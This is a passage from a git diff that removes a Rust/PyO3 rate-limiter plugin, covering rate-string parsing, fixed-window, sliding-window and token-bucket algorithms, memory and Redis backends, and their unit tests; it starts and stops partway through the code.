1_000_000_000 + 500_000_000 - ); - } - - #[test] - fn fake_clock_handle_clone_shares_state() { - let (clock, handle) = FakeClock::new(0); - let handle2 = handle.clone(); - handle2.advance_secs(10); - assert_eq!(clock.now_unix_secs(), 10); - assert_eq!(handle.unix_secs(), 10); - } - - #[test] - fn system_clock_monotonic_is_non_decreasing() { - let c = SystemClock; - let t1 = c.now_monotonic(); - let t2 = c.now_monotonic(); - assert!(t2 >= t1); - } - - #[test] - fn system_clock_unix_secs_is_positive() { - let c = SystemClock; - assert!(c.now_unix_secs() > 0); - } -} diff --git a/plugins_rust/rate_limiter/src/config.rs b/plugins_rust/rate_limiter/src/config.rs deleted file mode 100644 index 0392b848ce..0000000000 --- a/plugins_rust/rate_limiter/src/config.rs +++ /dev/null @@ -1,228 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Configuration types for the rate limiter engine. -// -// All rate strings are parsed once at engine init (`RateLimiterEngine::new`). -// The `by_tool` map is normalised (strip + lowercase) at init — never on the -// request path (IFACE-01, IFACE-05). - -use std::collections::HashMap; -use thiserror::Error; - -/// A parsed rate limit: `count` requests per `window_nanos` nanoseconds. -#[derive(Debug, Clone, Copy, PartialEq, Eq)] -pub struct RateLimit { - pub count: u64, - pub window_nanos: u64, -} - -/// Errors that can occur while parsing config. -#[derive(Debug, Error)] -pub enum ConfigError { - #[error("invalid rate string {0:?}: expected \"/\" where unit is s/m/h")] - InvalidRateString(String), - #[error("rate count must be > 0, got {0}")] - ZeroCount(u64), - #[error( - "invalid algorithm {0:?}: expected \"fixed_window\", \"sliding_window\", or \"token_bucket\"" - )] - InvalidAlgorithm(String), -} - -/// Parse a rate string like `"30/m"`, `"100/s"`, `"1000/h"`. -/// -/// Accepted units (case-insensitive): `s`, `sec`, `second`, `m`, `min`, -/// `minute`, `h`, `hr`, `hour`. -pub fn parse_rate(s: &str) -> Result { - let s = s.trim(); - let (count_str, unit_str) = s - .split_once('/') - .ok_or_else(|| ConfigError::InvalidRateString(s.to_string()))?; - - let count: u64 = count_str - .trim() - .parse() - .map_err(|_| ConfigError::InvalidRateString(s.to_string()))?; - - if count == 0 { - return Err(ConfigError::ZeroCount(count)); - } - - let window_secs: u64 = match unit_str.trim().to_ascii_lowercase().as_str() { - "s" | "sec" | "second" => 1, - "m" | "min" | "minute" => 60, - "h" | "hr" | "hour" => 3600, - _ => return Err(ConfigError::InvalidRateString(s.to_string())), - }; - - Ok(RateLimit { - count, - window_nanos: window_secs * 1_000_000_000, - }) -} - -/// Which counting algorithm to use. -#[derive(Debug, Clone, Copy, PartialEq, Eq)] -pub enum Algorithm { - FixedWindow, - SlidingWindow, - TokenBucket, -} - -impl Algorithm { - /// Parse an algorithm name from a string. - #[allow(clippy::should_implement_trait)] - pub fn from_str(s: &str) -> Option { - match s.trim().to_ascii_lowercase().as_str() { - "fixed_window" => Some(Self::FixedWindow), - "sliding_window" => Some(Self::SlidingWindow), - "token_bucket" => Some(Self::TokenBucket), - _ => None, - } - } -} - -/// Validated engine configuration, built from the raw Python dict. -#[derive(Debug, Clone)] -pub struct EngineConfig { - pub by_user: Option, - pub by_tenant: Option, - /// Normalised key → limit. Keys are already `.trim().to_lowercase()`. - pub by_tool: HashMap, - pub algorithm: Algorithm, -} - -impl EngineConfig { - /// Build from raw string fields (mirrors the Python `RateLimiterConfig` fields - /// that are relevant to the Rust engine — strict subset per IFACE-04). - pub fn new( - by_user: Option<&str>, - by_tenant: Option<&str>, - by_tool: HashMap, - algorithm: &str, - ) -> Result { - let by_user = by_user.map(parse_rate).transpose()?; - let by_tenant = by_tenant.map(parse_rate).transpose()?; - let by_tool = by_tool - .into_iter() - .map(|(k, v)| { - let normalised_key = k.trim().to_ascii_lowercase(); - parse_rate(&v).map(|limit| (normalised_key, limit)) - }) - .collect::, _>>()?; - let algorithm = Algorithm::from_str(algorithm) - .ok_or_else(|| ConfigError::InvalidAlgorithm(algorithm.to_string()))?; - Ok(Self { - by_user, - by_tenant, - by_tool, - algorithm, - }) - } -} - -#[cfg(test)] -mod tests { - use super::*; - - // --- parse_rate --- - - #[test] - fn parse_rate_seconds_short() { - let r = parse_rate("10/s").unwrap(); - assert_eq!(r.count, 10); - assert_eq!(r.window_nanos, 1_000_000_000); - } - - #[test] - fn parse_rate_minutes_short() { - let r = parse_rate("30/m").unwrap(); - assert_eq!(r.count, 30); - assert_eq!(r.window_nanos, 60 * 1_000_000_000); - } - - #[test] - fn parse_rate_hours_long() { - let r = parse_rate("1000/hour").unwrap(); - assert_eq!(r.count, 1000); - assert_eq!(r.window_nanos, 3600 * 1_000_000_000); - } - - #[test] - fn parse_rate_whitespace_stripped() { - let r = parse_rate(" 5 / min ").unwrap(); - assert_eq!(r.count, 5); - } - - #[test] - fn parse_rate_unsupported_unit_errors() { - assert!(parse_rate("10/day").is_err()); - } - - #[test] - fn parse_rate_no_slash_errors() { - assert!(parse_rate("10m").is_err()); - } - - #[test] - fn parse_rate_zero_count_errors() { - assert!(parse_rate("0/s").is_err()); - } - - // --- Algorithm::from_str --- - - #[test] - fn algorithm_from_str_all_variants() { - assert_eq!( - Algorithm::from_str("fixed_window"), - Some(Algorithm::FixedWindow) - ); - assert_eq!( - Algorithm::from_str("sliding_window"), - Some(Algorithm::SlidingWindow) - ); - assert_eq!( - Algorithm::from_str("token_bucket"), - Some(Algorithm::TokenBucket) - ); - assert_eq!(Algorithm::from_str("unknown"), None); - } - - // --- EngineConfig --- - - #[test] - fn engine_config_parses_all_fields() { - let mut by_tool = HashMap::new(); - by_tool.insert("Search".to_string(), "10/m".to_string()); - by_tool.insert(" Summarise ".to_string(), "5/m".to_string()); - - let cfg = EngineConfig::new(Some("30/m"), Some("300/m"), by_tool, "fixed_window").unwrap(); - - assert_eq!(cfg.by_user.unwrap().count, 30); - assert_eq!(cfg.by_tenant.unwrap().count, 300); - // Keys must be normalised - assert!(cfg.by_tool.contains_key("search")); - assert!(cfg.by_tool.contains_key("summarise")); - assert!(!cfg.by_tool.contains_key("Search")); - assert_eq!(cfg.algorithm, Algorithm::FixedWindow); - } - - #[test] - fn engine_config_all_none_is_valid() { - let cfg = EngineConfig::new(None, None, HashMap::new(), "sliding_window").unwrap(); - assert!(cfg.by_user.is_none()); - assert!(cfg.by_tenant.is_none()); - assert!(cfg.by_tool.is_empty()); - } - - #[test] - fn engine_config_invalid_rate_propagates_error() { - assert!(EngineConfig::new(Some("bad"), None, HashMap::new(), "fixed_window").is_err()); - } - - #[test] - fn engine_config_invalid_algorithm_propagates_error() { - assert!(EngineConfig::new(None, None, HashMap::new(), "leaky_bucket").is_err()); - } -} diff --git a/plugins_rust/rate_limiter/src/engine.rs b/plugins_rust/rate_limiter/src/engine.rs deleted file mode 100644 index 698b1b2bc3..0000000000 --- a/plugins_rust/rate_limiter/src/engine.rs +++ /dev/null @@ -1,615 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// `RateLimiterEngine` — the single PyO3-exposed class (IFACE-02). -// -// Python calls `check(user, tenant, tool, now_unix)` once per hook -// invocation (ARCH-01). The engine builds dimension keys, evaluates, -// aggregates, and returns pre-built header/meta dicts (ARCH-02). -// The Python wrapper is policy-only and never does rate math (ARCH-03). -// -// The older `evaluate_many()` / `evaluate_many_async()` entry points are -// retained for backward compatibility and test use but are not on the -// production hot path. - -use std::collections::HashMap; -use std::sync::Arc; - -use log::warn; -use pyo3::prelude::*; -use pyo3::types::{PyDict, PyList}; - -use pyo3_async_runtimes::tokio::future_into_py; -use pyo3_stub_gen::derive::*; - -use crate::clock::{Clock, SystemClock}; -use crate::config::{ConfigError, EngineConfig}; -use crate::memory::MemoryStore; -use crate::redis_backend::RedisRateLimiter; -use crate::types::{DimResult, EvalResult}; - -// --------------------------------------------------------------------------- -// Backend selection -// --------------------------------------------------------------------------- - -#[derive(Clone)] -enum EngineBackend { - Memory(Arc), - Redis(Arc), -} - -// --------------------------------------------------------------------------- -// Engine -// --------------------------------------------------------------------------- - -/// High-performance rate limiter engine. -/// -/// Construct once per plugin instance (`__init__`), then call -/// `check()` / `check_async()` on every hook invocation. -/// -/// Backend is selected at init time from the config dict: -/// - `backend: "memory"` (default) — in-process counting via `MemoryStore` -/// - `backend: "redis"` — Rust owns the Redis connection; same batch Lua -/// scripts as the Python `RedisBackend`, one EVAL per hook invocation -#[gen_stub_pyclass] -#[pyclass] -pub struct RateLimiterEngine { - config: EngineConfig, - backend: EngineBackend, - clock: Arc, -} - -impl RateLimiterEngine { - /// Internal constructor — always uses the memory backend. - /// Used by tests and benchmarks where clock injection is required. - pub fn new_with_clock(config: EngineConfig, clock: Arc) -> Self { - Self { - backend: EngineBackend::Memory(Arc::new(MemoryStore::new())), - config, - clock, - } - } -} - -#[gen_stub_pymethods] -#[pymethods] -impl RateLimiterEngine { - /// Construct from the Python config dict. - /// - /// Parses all rate strings and normalises `by_tool` keys at init time — - /// never on the request path (IFACE-01, IFACE-05). - /// - /// Extra keys consumed here (not part of `EngineConfig`): - /// - `backend`: `"memory"` (default) or `"redis"` - /// - `redis_url`: required when `backend = "redis"` - /// - `redis_key_prefix`: key namespace prefix (default `"rl"`) - #[new] - pub fn new(config: &Bound<'_, PyDict>) -> PyResult { - let by_user: Option = match config.get_item("by_user")? { - Some(v) if !v.is_none() => Some(v.extract::().map_err(|_| { - pyo3::exceptions::PyValueError::new_err("by_user must be a string like '60/m'") - })?), - _ => None, - }; - let by_tenant: Option = match config.get_item("by_tenant")? { - Some(v) if !v.is_none() => Some(v.extract::().map_err(|_| { - pyo3::exceptions::PyValueError::new_err("by_tenant must be a string like '600/m'") - })?), - _ => None, - }; - let algorithm: String = match config.get_item("algorithm")? { - Some(v) if !v.is_none() => v.extract::().map_err(|_| { - pyo3::exceptions::PyValueError::new_err( - "algorithm must be a string ('fixed_window', 'sliding_window', or 'token_bucket')", - ) - })?, - _ => "fixed_window".to_string(), - }; - - let by_tool: HashMap = match config.get_item("by_tool")? { - Some(v) if !v.is_none() => v.extract::>().map_err(|_| { - pyo3::exceptions::PyValueError::new_err( - "by_tool must be a dict of {tool_name: rate_string}", - ) - })?, - _ => HashMap::new(), - }; - - let engine_config = EngineConfig::new( - by_user.as_deref(), - by_tenant.as_deref(), - by_tool, - &algorithm, - ) - .map_err(|e: ConfigError| pyo3::exceptions::PyValueError::new_err(e.to_string()))?; - - let backend_str: String = config - .get_item("backend")? - .and_then(|v| v.extract().ok()) - .unwrap_or_else(|| "memory".to_string()); - - let backend = if backend_str == "redis" { - let redis_url: String = config - .get_item("redis_url")? - .and_then(|v| v.extract().ok()) - .ok_or_else(|| { - pyo3::exceptions::PyValueError::new_err( - "redis_url is required when backend=redis", - ) - })?; - let prefix: String = config - .get_item("redis_key_prefix")? - .and_then(|v| v.extract().ok()) - .unwrap_or_else(|| "rl".to_string()); - let redis_limiter = RedisRateLimiter::new(&redis_url, engine_config.algorithm, prefix) - .map_err(|e| { - warn!("Rust rate limiter: Redis backend init failed: {}", e); - pyo3::exceptions::PyRuntimeError::new_err(e.to_string()) - })?; - EngineBackend::Redis(Arc::new(redis_limiter)) - } else { - EngineBackend::Memory(Arc::new(MemoryStore::new())) - }; - - Ok(Self { - config: engine_config, - backend, - clock: Arc::new(SystemClock), - }) - } - - /// Evaluate all active dimensions in a single call (ARCH-01, IFACE-02). - /// - /// `checks` is a list of `(key, limit_count, window_nanos)` tuples built - /// by the Python wrapper from the request context. - /// - /// `now_unix` is `int(time.time())` from Python — passing it here means - /// Python test mocks of `time.time()` propagate to header timestamps (CORR-02). - /// - /// Returns the most restrictive `EvalResult` across all dimensions (ARCH-02). - /// - /// **Warning:** For the Redis backend, this method calls `block_on` on a - /// dedicated Tokio runtime. It must not be called from within an existing - /// Tokio runtime (e.g. from `pyo3-async-runtimes` worker threads) or it - /// will panic. Use `evaluate_many_async` for async contexts instead. - pub fn evaluate_many( - &self, - checks: Vec<(String, u64, u64)>, - now_unix: i64, - ) -> PyResult { - let dim_results = eval_dims_sync( - &self.backend, - self.config.algorithm, - &self.clock, - checks, - now_unix, - )?; - Ok(EvalResult::from_dims(&dim_results)) - } - - /// Evaluate all active dimensions asynchronously. - /// - /// Intended for Redis-backed deployments so Python async hooks can await - /// the Rust Redis path without blocking the event loop. - pub fn evaluate_many_async<'py>( - &self, - py: Python<'py>, - checks: Vec<(String, u64, u64)>, - now_unix: i64, - ) -> PyResult> { - let backend = self.backend.clone(); - let algorithm = self.config.algorithm; - let clock = Arc::clone(&self.clock); - - future_into_py(py, async move { - let dim_results = eval_dims_async(backend, algorithm, clock, checks, now_unix).await?; - Python::attach(|py| Py::new(py, EvalResult::from_dims(&dim_results))) - }) - } - - /// High-level check: builds dimension keys internally, evaluates, and - /// returns pre-built Python dicts for headers and metadata. - /// - /// This eliminates all per-attribute PyO3 accesses on the Python side. - /// The Python wrapper calls this once per hook invocation instead of - /// `evaluate_many()` + `_rust_to_plugin_meta()` + `_rust_to_plugin_headers()`. - /// - /// Returns `(allowed, headers_dict, meta_dict)`. - pub fn check<'py>( - &self, - py: Python<'py>, - user: &str, - tenant: Option<&str>, - tool: &str, - now_unix: i64, - include_retry_after: bool, - ) -> PyResult<(bool, Bound<'py, PyDict>, Bound<'py, PyDict>)> { - let checks = self.build_checks(user, tenant, tool); - if checks.is_empty() { - let headers = PyDict::new(py); - let meta = PyDict::new(py); - meta.set_item("limited", false)?; - return Ok((true, headers, meta)); - } - - let dim_results = eval_dims_sync( - &self.backend, - self.config.algorithm, - &self.clock, - checks, - now_unix, - )?; - - let eval = EvalResult::from_dims(&dim_results); - let headers = build_headers_dict(py, &eval, include_retry_after)?; - let meta = build_meta_dict(py, &eval, now_unix)?; - Ok((eval.allowed, headers, meta)) - } - - /// Async variant of `check()` for Redis-backed deployments. - /// - /// Returns an awaitable that resolves to `(allowed, headers_dict, meta_dict)`. - pub fn check_async<'py>( - &self, - py: Python<'py>, - user: &str, - tenant: Option<&str>, - tool: &str, - now_unix: i64, - include_retry_after: bool, - ) -> PyResult> { - let checks = self.build_checks(user, tenant, tool); - if checks.is_empty() { - return future_into_py(py, async move { - Python::attach(|py| -> PyResult> { - let headers = PyDict::new(py); - let meta = PyDict::new(py); - meta.set_item("limited", false)?; - let tup = pyo3::types::PyTuple::new( - py, - [ - true.into_pyobject(py)?.to_owned().into_any(), - headers.into_any(), - meta.into_any(), - ], - )?; - Ok(tup.into()) - }) - }); - } - - let backend = self.backend.clone(); - let algorithm = self.config.algorithm; - let clock = Arc::clone(&self.clock); - - future_into_py(py, async move { - let dim_results = eval_dims_async(backend, algorithm, clock, checks, now_unix).await?; - - let eval = EvalResult::from_dims(&dim_results); - Python::attach(|py| -> PyResult> { - let headers = build_headers_dict(py, &eval, include_retry_after)?; - let meta = build_meta_dict(py, &eval, now_unix)?; - let tup = pyo3::types::PyTuple::new( - py, - [ - eval.allowed.into_pyobject(py)?.to_owned().into_any(), - headers.into_any(), - meta.into_any(), - ], - )?; - Ok(tup.into()) - }) - }) - } -} - -// --------------------------------------------------------------------------- -// Shared dimension evaluation — used by evaluate_many, check (sync + async) -// --------------------------------------------------------------------------- - -/// Evaluate dimension checks synchronously (memory: GIL-released, Redis: block_on). -fn eval_dims_sync( - backend: &EngineBackend, - algorithm: crate::config::Algorithm, - clock: &Arc, - checks: Vec<(String, u64, u64)>, - now_unix: i64, -) -> PyResult> { - Python::attach(|py| { - py.detach(|| -> Result, String> { - eval_dims_inner(backend, algorithm, clock, checks, now_unix) - }) - .map_err(pyo3::exceptions::PyRuntimeError::new_err) - }) -} - -/// Evaluate dimension checks asynchronously (memory: direct, Redis: async). -async fn eval_dims_async( - backend: EngineBackend, - algorithm: crate::config::Algorithm, - clock: Arc, - checks: Vec<(String, u64, u64)>, - now_unix: i64, -) -> PyResult> { - match backend { - EngineBackend::Memory(store) => { - let now_mono = clock.now_monotonic(); - Ok(eval_dims_memory( - &store, algorithm, checks, now_mono, now_unix, - )) - } - EngineBackend::Redis(redis) => redis - .evaluate_many_async(&checks, now_unix) - .await - .map_err(|e| pyo3::exceptions::PyRuntimeError::new_err(e.to_string())), - } -} - -/// Backend dispatch for synchronous evaluation (called inside `py.detach`). -fn eval_dims_inner( - backend: &EngineBackend, - algorithm: crate::config::Algorithm, - clock: &Arc, - checks: Vec<(String, u64, u64)>, - now_unix: i64, -) -> Result, String> { - match backend { - EngineBackend::Memory(store) => { - let now_mono = clock.now_monotonic(); - Ok(eval_dims_memory( - store, algorithm, checks, now_mono, now_unix, - )) - } - EngineBackend::Redis(redis) => redis - .evaluate_many(&checks, now_unix) - .map_err(|e| e.to_string()), - } -} - -/// Evaluate checks against the in-memory store. -fn eval_dims_memory( - store: &MemoryStore, - algorithm: crate::config::Algorithm, - checks: Vec<(String, u64, u64)>, - now_mono: crate::clock::Nanos, - now_unix: i64, -) -> Vec { - checks - .into_iter() - .map(|(key, limit_count, window_nanos)| { - store.check_and_increment( - &key, - limit_count, - window_nanos, - algorithm, - now_mono, - now_unix, - ) - }) - .collect() -} - -// --------------------------------------------------------------------------- -// Private helpers — dimension key building and dict construction -// --------------------------------------------------------------------------- - -impl RateLimiterEngine { - /// Build dimension checks from engine config. - /// Mirrors Python `_build_rust_checks()` but runs in Rust. - fn build_checks( - &self, - user: &str, - tenant: Option<&str>, - tool: &str, - ) -> Vec<(String, u64, u64)> { - let mut checks = Vec::with_capacity(3); - if let Some(ref rl) = self.config.by_user { - checks.push((format!("user:{}", user), rl.count, rl.window_nanos)); - } - if let (Some(t), Some(rl)) = (tenant, &self.config.by_tenant) { - checks.push((format!("tenant:{}", t), rl.count, rl.window_nanos)); - } - // Tool names are normalised (lowercase) in EngineConfig at init time. - // Defensive lowercase here to avoid silent mismatches if caller forgets. - let tool_lower = tool.to_ascii_lowercase(); - if let Some(rl) = self.config.by_tool.get(&tool_lower) { - checks.push((format!("tool:{}", tool_lower), rl.count, rl.window_nanos)); - } - checks - } -} - -/// Build HTTP rate-limit headers dict — mirrors Python `_make_headers()`. -fn build_headers_dict<'py>( - py: Python<'py>, - eval: &EvalResult, - include_retry_after: bool, -) -> PyResult> { - let headers = PyDict::new(py); - if eval.limit == u64::MAX { - return Ok(headers); - } - headers.set_item("X-RateLimit-Limit", eval.limit.to_string())?; - headers.set_item("X-RateLimit-Remaining", eval.remaining.to_string())?; - headers.set_item("X-RateLimit-Reset", eval.reset_timestamp.to_string())?; - if include_retry_after && let Some(retry) = eval.retry_after { - headers.set_item("Retry-After", retry.to_string())?; - } - Ok(headers) -} - -/// Build metadata dict — mirrors Python `_rust_to_plugin_meta()`. -fn build_meta_dict<'py>( - py: Python<'py>, - eval: &EvalResult, - now_unix: i64, -) -> PyResult> { - let meta = PyDict::new(py); - let reset_in = eval - .retry_after - .unwrap_or_else(|| (eval.reset_timestamp - now_unix).max(0)); - // "limited" means rate limits are configured, not that the request was blocked. - meta.set_item("limited", true)?; - meta.set_item("remaining", eval.remaining)?; - meta.set_item("reset_in", reset_in)?; - - let has_violated = !eval.violated_dimensions.is_empty(); - let has_allowed = !eval.allowed_dimensions.is_empty(); - - if has_violated || has_allowed { - let dims = PyDict::new(py); - if has_violated { - let violated_list = PyList::empty(py); - for dim in &eval.violated_dimensions { - let d = PyDict::new(py); - let dim_reset_in = dim - .retry_after - .unwrap_or_else(|| (dim.reset_timestamp - now_unix).max(0)); - d.set_item("limited", true)?; - d.set_item("remaining", dim.remaining)?; - d.set_item("reset_in", dim_reset_in)?; - violated_list.append(d)?; - } - dims.set_item("violated", violated_list)?; - } - if has_allowed { - let allowed_list = PyList::empty(py); - for dim in &eval.allowed_dimensions { - let d = PyDict::new(py); - let dim_reset_in = (dim.reset_timestamp - now_unix).max(0); - d.set_item("limited", true)?; - d.set_item("remaining", dim.remaining)?; - d.set_item("reset_in", dim_reset_in)?; - allowed_list.append(d)?; - } - dims.set_item("allowed", allowed_list)?; - } - meta.set_item("dimensions", dims)?; - } - - Ok(meta) -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::clock::FakeClock; - use crate::config::Algorithm; - - fn init_python() { - Python::initialize(); - } - - fn engine_with_fake_clock( - by_user: Option<&str>, - algorithm: Algorithm, - ) -> (RateLimiterEngine, crate::clock::FakeClockHandle) { - init_python(); - let (clock, handle) = FakeClock::new(1_000_000); - let mut by_tool = HashMap::new(); - let cfg = EngineConfig { - by_user: by_user.map(|s| crate::config::parse_rate(s).unwrap()), - by_tenant: None, - by_tool: { - by_tool.insert( - "search".to_string(), - crate::config::parse_rate("5/m").unwrap(), - ); - by_tool - }, - algorithm, - }; - let engine = RateLimiterEngine::new_with_clock(cfg, Arc::new(clock)); - (engine, handle) - } - - // --- IFACE-01: config parsed at init --- - - #[test] - fn config_parsed_at_init_by_tool_normalised() { - let cfg = EngineConfig::new( - Some("10/s"), - None, - { - let mut m = HashMap::new(); - m.insert("Search".to_string(), "5/m".to_string()); - m - }, - "fixed_window", - ) - .unwrap(); - // Key must be lowercase - assert!(cfg.by_tool.contains_key("search")); - assert!(!cfg.by_tool.contains_key("Search")); - } - - // --- IFACE-02: evaluate_many returns EvalResult --- - - #[test] - fn evaluate_many_returns_eval_result_shape() { - let (engine, handle) = engine_with_fake_clock(Some("10/s"), Algorithm::FixedWindow); - let checks = vec![("user:alice".to_string(), 10, 1_000_000_000)]; - let result = engine.evaluate_many(checks, handle.unix_secs()).unwrap(); - // Shape: all fields present, first call always allowed - assert!(result.allowed); - assert_eq!(result.limit, 10); - assert!(result.remaining > 0); - assert!(result.retry_after.is_none()); - } - - // --- ARCH-01: evaluate_many is the only hot-path call --- - // (Structural — enforced by the interface: Python has no other method to call) - - // --- CORR-03: reset_timestamp > now on allowed requests --- - - #[test] - fn reset_timestamp_strictly_greater_than_now_on_allowed() { - let (engine, handle) = engine_with_fake_clock(Some("10/s"), Algorithm::FixedWindow); - let now_unix = handle.unix_secs(); - let checks = vec![("user:bob".to_string(), 10, 1_000_000_000)]; - let result = engine.evaluate_many(checks, now_unix).unwrap(); - assert!(result.allowed); - assert!( - result.reset_timestamp > now_unix, - "reset_timestamp {} must be > now {}", - result.reset_timestamp, - now_unix - ); - } - - // --- CORR-04: None tenant means no tenant check --- - // (Structural — Python wrapper never adds a tenant check when tenant_id is None) - - // --- CORR-07: multi-dimension aggregation picks most restrictive --- - - #[test] - fn evaluate_many_blocked_dimension_blocks_result() { - let (engine, _handle) = engine_with_fake_clock(Some("2/s"), Algorithm::FixedWindow); - // Exhaust the limit - let checks = || vec![("user:carol".to_string(), 2, 1_000_000_000)]; - let _ = engine.evaluate_many(checks(), 1_000_000).unwrap(); // 1 - let _ = engine.evaluate_many(checks(), 1_000_000).unwrap(); // 2 - let result = engine.evaluate_many(checks(), 1_000_000).unwrap(); // 3 — must be blocked - assert!(!result.allowed); - assert_eq!(result.remaining, 0); - assert!(result.retry_after.is_some()); - } - - #[test] - fn evaluate_many_multiple_dims_picks_most_restrictive() { - let (engine, _handle) = engine_with_fake_clock(None, Algorithm::FixedWindow); - // user has 10/s, tenant has 2/s — after 2 requests tenant is exhausted - let user_key = "user:dave".to_string(); - let tenant_key = "tenant:acme".to_string(); - let checks = || { - vec![ - (user_key.clone(), 10, 1_000_000_000), - (tenant_key.clone(), 2, 1_000_000_000), - ] - }; - let _ = engine.evaluate_many(checks(), 1_000_000).unwrap(); - let _ = engine.evaluate_many(checks(), 1_000_000).unwrap(); - let result = engine.evaluate_many(checks(), 1_000_000).unwrap(); - assert!(!result.allowed); // tenant exhausted → blocked - } -} diff --git a/plugins_rust/rate_limiter/src/lib.rs b/plugins_rust/rate_limiter/src/lib.rs deleted file mode 100644 index 5e3dcd25a2..0000000000 --- a/plugins_rust/rate_limiter/src/lib.rs +++ /dev/null @@ -1,36 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Rate Limiter Engine — Rust implementation. -// -// Exposed to Python via PyO3. One public class: `RateLimiterEngine`. -// One public hot-path method: `evaluate_many()` (ARCH-01, IFACE-02). - -use pyo3::prelude::*; -use pyo3_stub_gen::define_stub_info_gatherer; - -pub mod clock; -pub mod config; -pub mod engine; -pub mod memory; -pub mod redis_backend; -pub mod types; - -pub use engine::RateLimiterEngine; -pub use types::{EvalDimension, EvalResult}; - -/// Python module definition. -#[pymodule] -fn rate_limiter_rust(m: &Bound<'_, PyModule>) -> PyResult<()> { - // Bridge Rust `log` macros into Python's `logging` module so Rust - // engine messages appear in the same log stream as the Python plugin. - pyo3_log::init(); - - m.add_class::()?; - m.add_class::()?; - m.add_class::()?; - Ok(()) -} - -// Generate Python type stubs (.pyi files). -define_stub_info_gatherer!(stub_info); diff --git a/plugins_rust/rate_limiter/src/memory.rs b/plugins_rust/rate_limiter/src/memory.rs deleted file mode 100644 index 1bc31529f6..0000000000 --- a/plugins_rust/rate_limiter/src/memory.rs +++ /dev/null @@ -1,709 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// In-process memory backend for the rate limiter engine. -// -// Per-key locking via `parking_lot::RwLock` — no single global lock (MEM-01). -// Typed key is the raw string passed from the engine; callers are responsible -// for constructing distinct keys per dimension (e.g. "user:alice", "tenant:acme"). -// -// Algorithms implemented: -// - FixedWindow (MEM-02): HashMap -// - SlidingWindow (MEM-03): HashMap> -// - TokenBucket (MEM-04): HashMap -// -// Cleanup is amortized on access — no background sweep thread (MEM-05). -// Idle key eviction runs every ~128 calls to reclaim memory (MEM-06). - -use std::collections::{HashMap, VecDeque}; -use std::sync::atomic::{AtomicU64, Ordering}; - -use parking_lot::RwLock; - -use crate::clock::{Nanos, UnixSecs}; -use crate::config::Algorithm; -use crate::types::DimResult; - -/// How often (in calls) the amortized sweep runs. Power of 2 for cheap -/// modulo via bitwise AND. 128 means ~0.8% of calls pay the sweep cost. -const SWEEP_INTERVAL: u64 = 128; - -/// Token bucket keys inactive for longer than this are evicted (1 hour in -/// nanos). Matches the Python `TokenBucketAlgorithm.sweep` threshold. -const TOKEN_BUCKET_STALE_NANOS: u64 = 3_600_000_000_000; - -// --------------------------------------------------------------------------- -// Per-key state -// --------------------------------------------------------------------------- - -#[derive(Debug)] -enum KeyState { - FixedWindow { - count: u64, - window_start: Nanos, - /// Unix timestamp when the window started — used to compute a constant - /// reset_timestamp within the window (matching Python backend behaviour). - window_start_unix: UnixSecs, - /// Window duration in nanos — stored per key so sweep can evict at the - /// actual window boundary instead of using a hardcoded 1-hour threshold. - window_nanos: Nanos, - }, - SlidingWindow { - timestamps: VecDeque, - /// Window duration in nanos — stored per key so sweep can drain stale - /// timestamps and evict idle keys without waiting for the next access. - window_nanos: Nanos, - }, - TokenBucket { - /// Tokens × 1000 to avoid floating-point (CORR-05). - tokens_milli: u64, - last_refill: Nanos, - }, -} - -// --------------------------------------------------------------------------- -// MemoryStore -// --------------------------------------------------------------------------- - -pub struct MemoryStore { - inner: RwLock>>, - call_count: AtomicU64, -} - -impl Default for MemoryStore { - fn default() -> Self { - Self::new() - } -} - -impl MemoryStore { - pub fn new() -> Self { - Self { - inner: RwLock::new(HashMap::new()), - call_count: AtomicU64::new(0), - } - } - - /// Amortized sweep: remove keys whose state is stale (MEM-06). - /// - /// - FixedWindow: evict if the configured window has fully elapsed. - /// - SlidingWindow: drain stale timestamps, then evict if the deque is empty. - /// - TokenBucket: inactive for > 1 hour (matching Python `TokenBucketAlgorithm.sweep`). - fn sweep(&self, now_mono: Nanos) { - let mut write = self.inner.write(); - write.retain(|_key, key_lock| { - // Skip keys that are currently write-locked (actively being used). - let mut state = match key_lock.try_write() { - Some(guard) => guard, - None => return true, // contended — keep - }; - match &mut *state { - KeyState::FixedWindow { - window_start, - window_nanos, - .. - } => { - // Evict if the configured window has fully elapsed. - now_mono.saturating_sub(*window_start) < *window_nanos - } - KeyState::SlidingWindow { - timestamps, - window_nanos, - } => { - // Drain stale timestamps that have fallen outside the window, - // then evict if the deque is empty. This reclaims keys that - // went cold after traffic — previously they lingered forever - // because stale timestamps were only drained on access. - let cutoff = now_mono.saturating_sub(*window_nanos); - while timestamps.front().is_some_and(|&t| t <= cutoff) { - timestamps.pop_front(); - } - !timestamps.is_empty() - } - KeyState::TokenBucket { last_refill, .. } => { - // Evict if inactive for more than 1 hour. - now_mono.saturating_sub(*last_refill) < TOKEN_BUCKET_STALE_NANOS - } - } - }); - } - - /// Check the rate for `key` and increment the counter if allowed. - /// - /// Returns a `DimResult` with allow/block, remaining, reset_timestamp, - /// and retry_after. All timing uses the injected `now_mono` and `now_unix` - /// values — no direct clock calls inside this function (CORR-06). - pub fn check_and_increment( - &self, - key: &str, - limit: u64, - window_nanos: u64, - algorithm: Algorithm, - now_mono: Nanos, - now_unix: UnixSecs, - ) -> DimResult { - // Fast path: key already exists — single read lock on outer map. - let result = { - let read = self.inner.read(); - if let Some(key_lock) = read.get(key) { - let mut state = key_lock.write(); - Some(evaluate_state( - &mut state, - limit, - window_nanos, - now_mono, - now_unix, - )) - } else { - None - } - }; - - let result = result.unwrap_or_else(|| { - // Slow path: key missing — write lock to insert, then evaluate. - // Only runs on first access per key; steady-state always hits fast path. - let mut write = self.inner.write(); - let key_lock = write.entry(key.to_string()).or_insert_with(|| { - RwLock::new(new_key_state( - algorithm, - limit, - window_nanos, - now_mono, - now_unix, - )) - }); - let mut state = key_lock.write(); - evaluate_state(&mut state, limit, window_nanos, now_mono, now_unix) - }); - - // All locks dropped — amortized sweep (MEM-06). - let n = self.call_count.fetch_add(1, Ordering::Relaxed); - if n & (SWEEP_INTERVAL - 1) == 0 && n > 0 { - self.sweep(now_mono); - } - result - } -} - -// --------------------------------------------------------------------------- -// Helpers -// --------------------------------------------------------------------------- - -/// Create the initial key state for a new rate-limit key. -fn new_key_state( - algorithm: 